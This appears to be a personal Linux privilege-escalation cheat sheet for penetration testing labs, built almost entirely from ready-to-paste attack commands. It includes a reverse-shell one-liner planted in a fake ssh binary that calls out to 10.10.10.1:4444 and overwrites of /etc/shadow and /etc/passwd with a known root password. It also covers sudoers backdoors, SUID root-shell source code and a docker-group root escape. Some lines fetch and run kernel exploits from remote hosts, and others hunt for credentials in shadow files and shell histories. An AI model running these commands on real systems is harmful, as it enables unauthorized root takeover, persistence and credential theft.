Linux
1
Once you've found the patch to escalation click here:
2
https://github.com/Ignitetechnologies/Privilege-Escalation
3
​
Copied!

Linux Privilege Escalation Examples

1
https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/privilege-escalation/linux/linux-examples.rst
Copied!

​

MindMap

Useful commands to run

1
https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
Copied!

Things to look for

    Miss-configured services (cronjobs)
      any running as a privileged user?
    Incorrect file permissions (exportfs, sudo)
    Miss-configured environment ($PATH)
    Binary with SUID bit
    Software or OS with known vulnerabilities
    Docker usergroup

SUDO

Read http://touhidshaikh.com/blog/?p=790

Can you su to root without a password?

1
su root
Copied!
If you get an error "su: must be run from a terminal" use one of the shell fixes above
1
root ALL=(ALL) ALL
2
The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.
Copied!
1
jelly ALL= /sbin/poweroff
2
The user jelly can from any terminal, run the command power off using jelly's user password.
Copied!
1
jelly ALL = (root) NOPASSWD: /usr/bin/find
2
The user jelly can from any terminal, run the command find as root user without password.
Copied!
Are you a sudo user already? Do you have access to powerful commands like chown or chmod?
1
sudo su -
Copied!
Are you part of the sudo group, but not in the sudoers file?
1
id # 27(sudo)
2
pkexec sh
Copied!
What can we run with sudo?
1
sudo -l
Copied!
Try su as all users and the username as password
User bash history
1
cat ~/.bash_history; cat ~/.nano_history; cat ~/.atftp_history; cat ~/.mysql_history; cat ~/.php_history
Copied!

Spawning root shells

Create a copy of /bin/bash or /bin/sh can you call it rootbash - make sure its owned by the root user. Then use /bin/bash -p to run it

Questions to ask yourself

What user with what permissions + where am I?

1
id
2
pwd
Copied!

What usernames could I login as?

1
grep -vE "nologin|false" /etc/passwd
Copied!

What architecture?

1
uname -m
Copied!

Whats running on the machine?

1
ps aux
Copied!
look for something(s) that are running which is not standard

What files does the user have permission?

1
find / -user $USER
2
find / -name -*$USER* # looks for files with the username in it
Copied!

What services are running?

1
netstat -antup
Copied!
if things are here that are not on the nmap scan - could be a firewall rule blocking it is mysql in there? If so creds will be stored somewhere on the box

What is installed?

1
dpkg -l | awk '$1 ~ /ii/{print $2,$3}'
2
rpm -qa
3
#copy output over to kali and run /scripts/linux/pkg_lookup.sh to find a vulnerable version or do below
Copied!

Run on target

1
FILE="packages.txt"; FILEPATH="/tmp/$FILE"; /usr/bin/rpm -q -f /usr/bin/rpm >/dev/null 2>&1; if [ $? -eq 0 ]; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; else dpkg -l | grep ii | awk '{print $2 " " substr($3,1)}' > $FILEPATH; echo "kernel $(uname -r)" >> $FILEPATH; fi; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo "";
Copied!
Copy /tmp/packages.txt which it has created back to your machine and then run
1
#download this
2
https://raw.githubusercontent.com/rowbot1/burmatscripts/master/bash/vuln_pkg_lookup.sh
Copied!
1
./vuln_pkg_loookup.sh packages.txt
Copied!
1
# Common locations for user installed software
2
/usr/local/
3
/usr/local/src
4
/usr/local/bin
5
/opt/
6
/home
7
/var/
8
/usr/src/
9
​
10
# Debian
11
dpkg -l
12
​
13
# CentOS, OpenSuse, Fedora, RHEL
14
rpm -qa (CentOS / openSUSE )
15
​
16
# OpenBSD, FreeBSD
17
pkg_info
Copied!

What kernel version - low hanging fruit?

1
uname -a
Copied!

What web app creds can i find?

1
find . -iname 'config' 2>/dev/null
Copied!
Research where creds would be stored on certain webapps

Can you see the shadow file - get lucky?

1
cat /etc/shadow
Copied!
What services are running as root?:
1
ps aux | grep root
Copied!
Look for vulnerable/privileged components such as: mysql, sudo, udev, python
If /etc/exports if writable, you can add an NFS entry or change and existing entry adding the no_root_squash flag to a root directory, put a binary with SUID bit on, and get root.

Some programs that can be used to spawn a shell:

1
nmap
2
vim
3
less
4
more
Copied!

Docker

Are you in a docker usergroup
1
uid=1000($user)gid=1000($user)groups=1000($user),24(cdrom),25(floppy),999(docker)
2
​
Copied!
Get the image name docker ps then run
1
docker run -v /:/mnt --rm -it $imagenamehere chroot /mnt sh
Copied!
this will then get you a root shell

Cron Jobs

What jobs are scheduled?

1
crontab -l 2>/dev/null
2
ls -alh /var/spool/cron 2>/dev/null
3
ls -al /etc/ | grep cron 2>/dev/null
4
ls -al /etc/cron* 2>/dev/null
5
cat /etc/cron* 2>/dev/null
6
cat /etc/at.allow 2>/dev/null
7
cat /etc/at.deny 2>/dev/null
8
cat /etc/cron.allow 2>/dev/null
9
cat /etc/cron.deny 2>/dev/null
10
cat /etc/crontab 2>/dev/null
11
cat /etc/anacrontab 2>/dev/null
12
cat /var/spool/cron/crontabs/root 2>/dev/null
Copied!
If there is a cronjob that runs as run but it has incorrect file permissions, you can change it to run your SUID binary and get a shell.
The following command will list processes running by root, permissions and NFS exports.
1
echo 'services running as root'; ps aux | grep root; echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null
Copied!
Use netstat to find other machines connected
1
netstat -ano
Copied!

Confidential information and users

1
id
2
su
3
sudo -l
4
cat /etc/passwd
5
cat /etc/shadow
6
cat /etc/group
7
cat /etc/sudoers # who is in there are you?
8
ls -alh /var/mail/
9
ls -ahlR /root
10
ls -ahlR /home/
Copied!
1
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 {print $1}' #any other super users?
Copied!

Find interesting files and directories fast

find / -name "*.txt" 2> >(grep -v 'Permission denied' >&2)
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)

File Write

If you can write to any of these files or directories you have a good chance of PE
1
~/.ssh/authorized_keys
2
/var/www/html
3
/var/spool/cron/crontabs/$user
4
/etc/crontab
5
/etc/cron.*
6
$PATH or Libraries(.py)
7
/etc/systemd/system
8
/etc/init.d
9
/etc/sudoers
Copied!

If you have found a download it to your box and open it in Ghidra. Check the main function to view de-compiled commands interesting binary SUID files / binaries

Things to remember:
    Run strings on the binary. Read all of it, don't just read the bottom of the output - read the top. Look for programs that the binary calls like curl. If you spot one then if it doesn't have its full path you can exploit it by modifying the path variable and creating a file with /bin/bash. See box symofonos:1.
The file will run as the owner no matter who executes it. So if root owns it, we can run it and hijack it to become root
1
ltrace ./binary
2
# step through binary may result in revealing password if password is needed to run it
Copied!
Could not load image

Capabilities

Linux capabilities provide a subset of the available root privileges to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation.
1
https://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-capabilities
Copied!
Capabilities name
Description
CAP_AUDIT_CONTROL
Allow to enable/disable kernel auditing
CAP_AUDIT_WRITE
Helps to write records to kernel auditing log
CAP_BLOCK_SUSPEND
This feature can block system suspends
CAP_CHOWN
Allow user to make arbitrary change to files UIDs and GIDs (full filesystem access)
CAP_DAC_OVERRIDE
This helps to bypass file read, write and execute permission checks (full filesystem access)
CAP_DAC_READ_SEARCH
This only bypass file and directory read/execute permission checks
CAP_FOWNER
This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file
CAP_KILL
Allow the sending of signals to processes belonging to others
CAP_SETGID
Allow changing of the GID
CAP_SETUID
Allow changing of the UID (set UID of root in you process)
CAP_SETPCAP
Helps to transferring and removal of current set to any PID
CAP_IPC_LOCK
This helps to lock memory
CAP_MAC_ADMIN
Allow MAC configuration or state changes
CAP_NET_RAW
Use RAW and PACKET sockets
CAP_NET_BIND_SERVICE
SERVICE Bind a socket to internet domain privileged ports
CAP_SYS_CHROOT
Ability to call chroot()

World-writable folders

1
find / -writable -type d 2>/dev/null
Copied!
1
find / -perm -222 -type d 2>/dev/null
Copied!
1
find / -perm -o w -type d 2>/dev/null
Copied!

World-executable folders

1
find / -perm -o x -type d 2>/dev/null
Copied!

World-writeable & executable folders

1
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null
Copied!

gives a bit more info

1
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
Copied!

Word writable directories for root

1
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root
Copied!

Look for binaries with the SUID or GUID bits set.

1
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
Copied!
1
find / -perm -1000 -type d 2>/dev/null
Copied!
1
find / -perm -g=s -type f 2>/dev/null
Copied!
1
find / -user root -perm -4000 -print 2>/dev/null
Copied!
In plain English, this command says to find files in the / directory owned by the user root with SUID permission bits (-perm -4000), print them, and then redirect all errors (2 = stderr) to /dev/null (where they get thrown away). The reason for this redirect is that we aren't interested in things that we can't access, and access denied errors can fill up a terminal pretty fast.
Adding a binary to PATH, to hijack another SUID binary invokes it without the fully qualified path.
1
function /usr/bin/foo () { /usr/bin/echo "It works"; }
2
export -f /usr/bin/foo
3
/usr/bin/foo
4
It works
Copied!
If you can get root to execute anything, the following will change a binary owner to him and set the SUID flag:
1
chown root:root /tmp/setuid;chmod 4777 /tmp/setuid;
Copied!
1
#look for the string password in files in the current directory
2
grep -rwl "password"
Copied!

/etc/shadow overwrite

If a SUID binary allows you to write to a file, overwrite /etc/shadow with the following then su to root using password rowbot
1
root:$6$saltsalt$zjiFtiGFBUkyU86/TTUE1Dgg6ZNem6QUdhcVVRsjLXvWGjCm90F/2.PDpGOfGCspP0/j6a6YLlImSqQZIUmqc.:18294:0:99999:7:::
Copied!

Check running services and installed applications

ps -ef cat /etc/services dpkg -l rpm -qa
An example here is for instance that you see a local database like mysql is running. Maybe you are able to find credentials for it and log into it locally on the box
If MYSQL is running as root, you can run commands using sys_exec(). For instance, to add user to sudoers:
1
ps -aux | grep root | grep mysql
Copied!
1
sys_exec('usermod -a -G admin username')
Copied!
More about MYSQL:
1
https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/
Copied!
Command to skip ignored lines in config files
1
alias nonempty="egrep -v '^[ \t]*#|^#x27;"
Copied!
Find Linux distribution & version
1
cat /etc/issue; cat /etc/*-release; cat /etc/lsb-release; cat /etc/redhat-release;
Copied!
Check versions - use in conjunction with searchsploit
1
dpkg -l
2
rpm -qa
3
httpd -v
4
mysql --version
5
python --version
6
ruby -v
Copied!

Architecture

1
cat /etc/*release
2
uname -m
Copied!

Environment variables

1
cat /etc/profile; cat /etc/bashrc; cat ~/.bash_profile; cat ~/.bashrc; cat ~/.bash_logout; env; set
Copied!
Find printers
1
lpstat -a
Copied!

Find apps installed;

1
ls -alh /usr/bin/; ls -alh /sbin/; dpkg -l; rpm -qa; ls -alh /var/cache/apt/archivesO; ls -alh /var/cache/yum/*;
Copied!

Find writable configuration files

1
find /etc/ -writable -type f 2>/dev/null
Copied!

Miss-configured services

1
cat /etc/syslog.conf; cat /etc/chttp.conf; cat /etc/lighttpd.conf; cat /etc/cups/cupsd.conf; cat /etc/inetd.conf; cat /etc/apache2/apache2.conf; cat /etc/my.conf; cat /etc/httpd/conf/httpd.conf; cat /opt/lampp/etc/httpd.conf; ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
Copied!

Scheduled jobs

1
crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron*; cat /etc/cron*; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny'
Copied!

Grep hardcoded passwords

1
grep -i user [filename]
2
grep -i pass [filename]
3
grep -C 5 "password" [filename]
4
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
Copied!

if web server run in web root:

1
grep "localhost" ./ -R
Copied!

Network configuration

1
/sbin/ifconfig -a; cat /etc/network/interfaces; cat /etc/sysconfig/network; cat /etc/resolv.conf; cat /etc/sysconfig/network; cat /etc/networks; iptables -L; hostname; dnsdomainname
Copied!
List other users home directories
1
ls -ahlR /root/; ls -ahlR /home/
Copied!
User mails
1
cat ~/.bashrc; cat ~/.profile; cat /var/mail/root; cat /var/spool/mail/root
Copied!
Find interesting binaries
1
find / -name wget 2>/dev/null; find / -name nc* 2>/dev/null; find / -name netcat* 2>/dev/null; find / -name tftp* 2>/dev/null; find / -name ftp 2>/dev/null
Copied!

Mounted filesystems

1
mount; df -h; cat /etc/fstab
Copied!
If you can just change PATH, the following will add a poisoned ssh binary:
1
set PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
2
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh
3
chmod +x ssh
Copied!
1
#Ippsec demoing $PATH PE
2
https://www.youtube.com/watch?v=3VxZNflJqsw
Copied!

Generating SUID C Shell for /bin/bash

1
int main() {
2
setuid(0);
3
system("/bin/bash -p");
4
}
Copied!
Compile using gcc -o <name> <filename.c>
Without interactive shell
1
echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c
Copied!
If /etc/passwd has incorrect permissions, you can root:
1
echo 'root::0:0:root:/root:/bin/bash' > /etc/passwd; su
2
or
3
echo "root:JblITMXA7I1hg:0:0:root:/root:/bin/bash" > /etc/passwd
4
then su using password rowbot
Copied!
or
1
openssl passwd
2
#put in password, output is random sting
3
#pass this on the x part of root in /etc/passwd
4
su root using the password u set
Copied!
Add user www-data to sudoers without password
1
chmod 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
Copied!
If you can sudo chmod:
1
echo -e '#include <stdio.h>\n#include <sys/types.h>\n#include <unistd.h>\n\nint main(void){\n\tsetuid(0);\n\tsetgid(0);\n\tsystem("/bin/bash");\n}' > setuid.c $ sudo chown root:root /tmp/setuid; sudo chmod 4777 /tmp/setuid; /tmp/setuid
Copied!
Wildcard injection if there is a cron with a wildcard in the command line, you can create a file, whose name will be passed as an argument to the cron task, For more info:
1
https://www.sans.org/reading-room/whitepapers/testing/attack-defend-linux-privilege-escalation-techniques-2016-37562
Copied!
compile exploit fix error
1
gcc 9545.c -o 9545 -Wl,--hash-style=both
Copied!
Find other uses in the system
1
$id; who; w; last; cat /etc/passwd | cut -d: -f1; echo 'sudoers:'; cat /etc/sudoers; sudo -l
Copied!
1
grep home /etc/passwd|cut -d: -f1
Copied!

World readable/writable files:

1
cho "world-writeable folders"; find / -writable -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -222 -type d 2>/dev/null; echo "world-writeable folders"; find / -perm -o w -type d 2>/dev/null; echo "world-executable folders"; find / -perm -o x -type d 2>/dev/null; echo "world-writeable & executable folders"; find / \( -perm -o w -perm -o x \) -type d 2>/dev/null;
Copied!
Find world-readable files:
1
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
Copied!
Find nobody owned files
1
ind /dir -xdev \( -nouser -o -nogroup \) -print
Copied!
Add user to sudoers in python.
1
#!/usr/bin/env python
2
import os
3
import sys
4
try:
5
os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
6
except:
7
sys.exit()
Copied!
Ring0 kernel exploit for 2.3/2.4
1
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c; gcc 36038-6.c -m32 -o ring0; chmod +x ring0; ./ring0
Copied!

Inspect web traffic

1
tcpdump tcp port 80 -w output.pcap -i eth0
Copied!

Scripts to run

Copy them over

Creates folder /tmp/rowbot and copies files on kali web server to target
1
wget -nd -np -R "index.html*" -P /tmp/rowbot --recursive http://kali$ip
Copied!
What is running, any cron jobs any scripts? Use PSPY to find out
1
https://github.com/DominicBreuker/pspy
Copied!
Useful script to run for initial scan - displays info on box
1
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
2
sed -i -e 's/\r$//' bangenum.sh
3
./bangenum.sh
Copied!
Use this tool first to help you get in the PE mindset.
1
https://github.com/diego-treitos/linux-smart-enumeration
Copied!

SUID search - good tool

1
https://github.com/Anon-Exploiter/SUID3NUM
2
https://github.com/TH3xACE/SUDO_KILLER
Copied!

Automatically downloads and compiles exploit

The following script runs exploit suggester and automatically downloads and executes suggested exploits:
1
wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py
Copied!
1
USAGE: xploit_installer.py <exploit id>
Copied!

Linux Remote Exploits

1
47: shellshock
2
48: heartbleed
Copied!

Kernelpop

automated kernel vulnerability enumeration and exploitation
Could not load image
1
https://github.com/spencerdodd/kernelpop
Copied!

Linux Local Exploits

1
49: linux-exploit-suggester
2
50: unix_privesc_check
3
51: kernel 2.4.x / 2.6.x (sock_sendpage 1)
4
52: kernel 2.4 / 2.6 (sock_sendpage 2)
5
53: kernel < 2.6.22 (ftruncate)
6
54: kernel < 2.6.34 (cap_sys_admin)
7
55: kernel 2.6.27 < 2.6.36 (compat)
8
56: kernel < 2.6.36-rc1 (can bcm)
9
57: kernel <= 2.6.36-rc8 (rds protocol)
10
58: *kernel < 2.6.36.2 (half nelson)
11
59: *kernel <= 2.6.37 (full nelson)
12
60: kernel 2.6 (udev)
13
61: kernel 3.13 (sgid)
14
62: kernel 3.13.0 < 3.19 (overlayfs 1)
15
63: kernel 3.14.5 (libfutex)
16
64: kernel 2.6.39 <= 3.2.2 (mempodipper)
17
65: *kernel 2.6.28 / 3.0 (alpha-omega)
18
66: kernel 2.6.22 < 3.9 (Dirty Cow)
19
67: kernel 3.7.6 (msr)
20
68: *kernel < 3.8.9 (perf_swevent_init)
21
69: kernel <= 4.3.3 (overlayfs 2)
22
70: kernel 4.3.3 (overlayfs 3)
23
71: kernel 4.4.0 (af_packet)
24
72: kernel 4.4.x (double-fdput)
25
73: kernel 4.4.0-21 (netfilter)
26
74: *kernel 4.4.1 (refcount)
Copied!
1
wget http://www.securitysift.com/download/linuxprivchecker.py
Copied!

Linux Kernel Exploits

Check kernel version
1
uname -r : Find Linux kernel version.
2
cat /proc/version : Show Linux kernel version with help of a special file.
3
hostnamectl | grep Kernel : For systemd based Linux distro you can use hotnamectl to display hostname and running Linux kernel version.
Copied!
Then do a search for it on this page
1
https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md
Copied!
Could not load image
https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md
​

Unix Priv checker

1
wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh
Copied!
Other scripts:
1
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
Copied!

LinEnum

Remember to run them again if you get a user shell not just www-data shell
1
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Copied!
1
./LinEnum.sh -t -r report.txt
Copied!

LinuxPrivchecker.py

1
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
Copied!
1
wget https://raw.githubusercontent.com/PenturaLabs/Linux_Exploit_Suggester/master/Linux_Exploit_Suggester.pl
Copied!
1
wget https://www.rebootuser.com/?p=1758
Copied!

Exploits worth running

Always be sure to read the comments in exploits they inform you about which systems and version are vulnerable, which parts of the script need modification & which compilation flags to use. $targetip 32 bit or 64 bit? Be mindful of this when compiling exploits.

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation

1
https://www.exploit-db.com/exploits/37292
Copied!

CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8

1
https://www.exploit-db.com/exploits/15285/
Copied!

Linux Kernel <= 2.6.37 'Full-Nelson.c'

1
https://www.exploit-db.com/exploits/15704/
Copied!

CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)

1
https://git.zx2c4.com/CVE-2012-0056/about/
Copied!

Linux CVE 2012-0056

1
wget -O exploit.c <http://www.exploit-db.com/download/18411>
2
gcc -o mempodipper exploit.c
3
./mempodipper
Copied!

CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8

1
https://dirtycow.ninja/
Copied!

Compile dirty cow:

1
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
Copied!

Cross compiling exploits

1
gcc -m32 -o output32 hello.c #(32 bit)
2
gcc -m64 -o output hello.c # (64 bit)
Copied!

Linux 2.6.32

1
https://www.exploit-db.com/exploits/15285/
Copied!

Elevation in 2.6.x:

1
for a in 9352 9513 33321 15774 15150 15944 9543 33322 9545 25288 40838 40616 40611 ; do wget http://yourIP:8000/$a; chmod +x $a; ./$a; id; done
Copied!

Get proof

1
echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "
Copied!
​
Last modified 5mo ago